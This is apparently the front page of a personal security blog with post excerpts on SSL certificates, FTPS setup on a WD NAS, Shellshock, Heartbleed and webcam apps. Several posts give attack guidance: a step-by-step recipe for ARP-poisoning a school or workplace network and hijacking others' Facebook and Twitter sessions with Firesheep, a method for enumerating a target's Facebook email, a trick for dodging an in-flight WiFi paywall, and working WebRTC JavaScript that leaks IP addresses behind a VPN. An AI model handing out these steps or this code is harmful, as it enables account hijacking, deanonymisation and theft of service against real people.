Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

20Jul/170

Free SSL certificates

StartSSL certificates isn't trusted by several major browsers anymore and will probably lose all credibility and disappear from the market completely. In it's place we have seen Let's Encrypt growth explode for the last 18 months. This post will cover some background and how to use setup Let's Encrypt on your Amazon EC2 Apache based server.

Continue reading...

6Mar/170

Free in flight Wifi

For the last year and a half I have been flying back and forth between Sweden and San Francisco. Most of the airlines I fly have in flight Wifi for a cost. Usually I think it's pretty reasonable money for the 11 hours or so I get a connection. But when ever I get bored I need a challenge and I have found several ways to get around the payment wall.

Most airlines are pretty bad at blocking things like SSH proxy's on unexpected ports or DNS tunneling. I realize that most people don't know how to do that or have a linux box around that responds to SSH on all different kind of ports. There is a few other tricks you can do as well.

Last time I flow from San Francisco to Frankfurt I found that I could either pay or login with my account. Since I had an  account since before I opted for the "Reset my password" link  and entered my e-mail. How would I be able to get my password? Didn't have any internet connection yet. Would they unblock the common ports for e-mail apps? No they unblocked everything for 20 minutes. Enough for me to download an audio book and chat with my wife on Skype. Then it blocked again...

But I forgot to download my password, right... So I did a reset again and chatted with my wife for another 20 minutes for free. Third time it directed me to call customer support but at least I got 40 minutes of free internet. After getting back to Sweden I Googled it, I couldn't have been the only one that found this, right?

Didn't find as much info as I thought I would on different travel forums that I frequent but there were a few posts. One similar to mine is this one GENIUS FLIGHT HACK: Free Wi-Fi on US Air, AA, Delta, and More! It's basicly the same principal but for downloading the airline app instead.

So if you just want to check something quickly or download something to listen to this is an easy way to get around the payment firewall. From a legal point of view I can't really see any issues since they allow you any type of internet access after sending the "Reset my password" form. Their mistake is to open up all ports instead of just e-mail ports and browsing to the most common webmails.

5May/162

WD NAS: Enable FTPS

Sending unencrypted FTP across the internet is a bad idea! You send your credentials in plain text compromising access security as well as the data your sending. My book live duo has, as most NAS products, support for unencrypted FTP. Since it's based on vsftpd it's only a matter of configuration to make it a much more secure FTPS implementation instead. In this post I'm using my Western Digital My Book Live Duo but this is applicable to most Western Digital NAS products and many other brands as well.

Enable SSH

First of all we need to enable SSH to be able to get access more configuration options for the FTP service. By accessing http://{WD IP-address}/UI/ssh you will see a screen where you can enable SSH access and get the root password.

Enable SSH

After this we can connect to the Live Duo via SSH. I recommend that you change the root password the first thing you do, use the passwd command to accomplish this.

Create certificate

The My Book Live Duo, and probably most of the other models as well (since the share much of the firmware), already have openssl installed which we can use to create the certificate. First we need to create a folder for the certificates and generate them. I generate both 2048bit and 4096bit certificates since I want to test the performance difference (see below). You should not use the 1024bit key length since that has been proven to be weak and can be broken.

mkdir /etc/ssl/ftp
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/ftp/vsftpd_2048.key -out /etc/ssl/ftp/vsftpd_2048.pem
openssl req -x509 -nodes -days 365 -newkey rsa:4096 -keyout /etc/ssl/ftp/vsftpd_4096.key -out /etc/ssl/ftp/vsftpd_4096.pem

You will be asked a bunch of questions about location and other stuff. You can more or less put in whatever you like since this is a self signed certificate it will never automatically be trusted by clients anyway so the information is pretty much irrelevant.

Configure FTP (vsftpd)

The My Book Live Duo already have an FTP service that you can enable from the UI. It use vsftpd which supports SSL and TLS, which we want to use for this, as long as OpenSSL is available on the box and apparently it is since we generated the certificates. First we make a copy of the original conf file for save keeping and then open it for editing.

cp /etc/vsftpd.conf /etc/vsftpd.conf.bak
nano /etc/vsftpd.conf

At the end of the file we add:

#SSL CONF
rsa_cert_file=/etc/ssl/ftp/vsftpd_2048.pem
rsa_private_key_file=/etc/ssl/ftp/vsftpd_2048.key

ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES

ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO

require_ssl_reuse=NO
ssl_ciphers=HIGH

Then CTRL + O to save and then CTRL + X to exit nano. Then we restart the FTP service.

/etc/init.d/vsftpd restart

filezilla_ssl_warning

Now you can try it from Filezilla, or what ever client software you like that supports ftps. In Filezilla you will get this certificate warning where you can see the additional information you put in when you created the certificate.

Performance - 2048 vs 4096

First run with the configuration above gave me around 8.9MiB/s transfer speeds and the CPU of the Live Book Duo was around 89%. I change the certificates to the 4096bit ones, restart the service and try again. More or less got the same numbers with the higher encryption so the CPU is not the bottleneck for the throughput. At the same time I'm not running any other services besides the SMB shares on this device.

Make backup of the config file

cp /etc/vsftpd.conf* /shares/Backup/

The backup is good to have if a firmware update changes the config file back. I have tried to enable and disable the FTP service and that doesn't effect the configuration at least.

5Apr/160

Comcast Xfinity: Disable XfinityWiFi

Never liked the additional SSID xfinitywifi that my Comcast router broadcasts. What ever Comcast writes on their site of course it effects my bandwidth and my overall wifi performance. If you login to your customer pages at xfinity.com there is an option to disable it (outlined here). I also disabled my own wifi since the 2.4Ghz band is way to crowded where I live but still the wifi radio is running in the router and quite frankly I don't trust Comcast on this issue. So why not just disable it all together and especially if your not using it? If you are still using any $50 wifi router will give you much better performance so just use that instead!
Continue reading...

6Feb/151

WebRTC vulnerability exposes VPN users

It's now easy to expose the true IP address of VPN users. Daniel Roesler published the an example howto exploit the bug on Github. Firefoz, Mozilla, Chroma and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRtc is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using VPN the computers internal network address will be exposed. This implementation is used for the WebRtc to handle NAT on the network and be able to bind sessions to the public IP. However the bug is really nasty because it exposes these functions to javascript. So this entire implementation below is made with javascript. The request is not registered in the developer console and can not be blocked by plugins.

If the user is using a lightweight VPN client, like a chrome plugin, the VPN will be bypassed all together and both the real public IP and internal NAT address will be shown.

Below there is a demo, if you see your public and private IP your browser is vulnerable for this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

    Your public IP addresses:

      <script>
      function getIPs(){
          var ip_dups = {};
          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
          || window.mozRTCPeerConnection
          || window.webkitRTCPeerConnection;
          var mediaConstraints = {
              optional: [{RtpDataChannels: true}]
          };
          //firefox already has a default stun server in about:config
          // media.peerconnection.default_iceservers =
          // [{"url": "stun:stun.services.mozilla.com"}]
          var servers = undefined;
          //add same stun server for chrome
          if(window.webkitRTCPeerConnection)
              servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
              //construct a new RTCPeerConnection
              var pc = new RTCPeerConnection(servers, mediaConstraints);
              //listen for candidate events
              pc.onicecandidate = function(ice){
              //skip non-candidate events
              if(ice.candidate){
                  //match just the IP address
                  var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
                  var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
                  //remove duplicates
                  if(ip_dups[ip_addr] === undefined)
                      var li = document.createElement("li");
                      li.textContent = ip_addr;
                      //local IPs
                      if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
                          document.getElementById("localip").appendChild(li);
                      //assume the rest are public IPs
                      else
                          document.getElementById("publicip").appendChild(li);
                          ip_dups[ip_addr] = true;
              }
          };
          //create a bogus data channel
          pc.createDataChannel("");
          //create an offer sdp
          pc.createOffer(function(result){
              //trigger the stun server request
              pc.setLocalDescription(result, function(){}, function(){});
          });
      }
      

      26Sep/140

      Check for shellshock

      Shellshok

      So the new issue on the board is shellshock? Not really it has been around for 20 years but hasn't been a problem until now. Same with heartbleed, was there for over two years before it was discovered. I will show you how to check if your effected and how to stay safe.

      Continue reading...

      25Sep/140

      Open Source: A false sense of security

      Heartbleed

      The heartbleed vulnerability dropped like a bombshell, a large majority of web servers on the internet was sharing there memory with the world. The even bigger bombshell was that the vulnerability had existed for over two years. Most people consider open source more secure then proprietary code since anyone can verify that it's safe. The problem is that most people think that someone else already done that!

      Continue reading...

      4Nov/120

      Viewing Axis webcam from iPhone

      I just installed an axis webcam at home to keep tabs on my home when I'm not there. I tried a few apps for my iPhone to use the cam as easy as possible. I found four free apps for Axis cameras but only one that actually was usable.

      Netcamviewer - Don't support SSL.

      CamControl - Works great! Or at least the only one that supports SSL.

      CamViewer - Looks really unprofessional, don't support SSL.

      CamSee  - Don't support SSL.

      26Jun/120

      Facebook login open to enumeration

      The error message above is in Swedish, the short version: "The e-mail address you entered isn't connected to any account in our system." So instead of telling me that my username / password combo was unsuccessful they actually help me with half the problem. If they only would have told me that the username and password combo was bad I wouldn't know if I had the correct e-mail address for the account i'm interested in. So I will just try the different e-mail addresses I know of my intended target with some bullshit password until I get "wrong password" error and then I know what e-mail they use. Really not good Facebook!

      26Oct/100

      Hacking Facebook, Twitter and more…

      No one have missed the release of Firesheep, I hope. The new easy way to hack your way into other peoples accounts on Facebook, Twitter, WordPress, Flickr, Google and more. The exploit is a plugin for Firefox that captures network traffic and intercepts the session cookies from the sites. This isn't new to any one but it's the way it's implemented that is nice and will get people moving trying to fix there broken sites. If you can't scale up your service safely with SSL you shouldn't scale up at all. When you installed the plugin in Firefox just hit "Start Capturing" and when ever it finds a service cookie it will pop-up with the username and picture.

      It's been announced that this is an axploit for unprotected wireless networks but that isn't all true. If you use a simple man in the middle attack you can capture the traffic on a wired network you got access to in your school or at your work place. There are simple ways of doing this.

      1. Download Cain & Able and install it! (http://www.oxid.it/cain.html)
      2. Download Wincap and install it! (http://www.winpcap.org/install/default.htm)
      3. Download Firesheep and install it, if your browser saves it as a .zip file rename it to .xpi. Then just open firefox menu "Tools" -> "Add-ons" and drag-and-drop the file into the window. (http://github.com/codebutler/firesheep/downloads)
      4. Read this how-to and do a man in the middle attack on your current network. (http://skateass.com/wordpress/cain-arp-poisoning-cracking-and-sniffing-passwords-and-packets/)
      5. Start Firefox, goto "View" -> "Sidebar" -> "Firesheep" then hit "Start Capturing". Now all the sessions created to the sites will be at your disposal.

      You can even create custom site profiles in Firesheep and capture other services then the ones already in there.

      What else do you want to read about? Please hit me with some comments!